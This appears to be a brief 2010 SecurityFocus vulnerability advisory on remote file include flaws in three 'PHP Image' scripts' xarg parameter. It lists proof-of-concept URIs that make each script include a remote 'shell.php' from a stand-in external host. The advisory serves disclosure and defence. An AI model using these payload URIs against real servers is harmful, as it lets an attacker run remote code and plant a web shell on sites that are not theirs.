PHP Image XArg Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/xarg_corner.php?xarg=http://www.example2.com/shell.php?
http://www.example.com/xarg_corner_bottom.php?xarg=http://www.example2.com/shell.php? http://www.example.com/xarg_corner_top.php?xarg=http://www.example2.com/shell.php?


 

Privacy Statement
Copyright 2010, SecurityFocus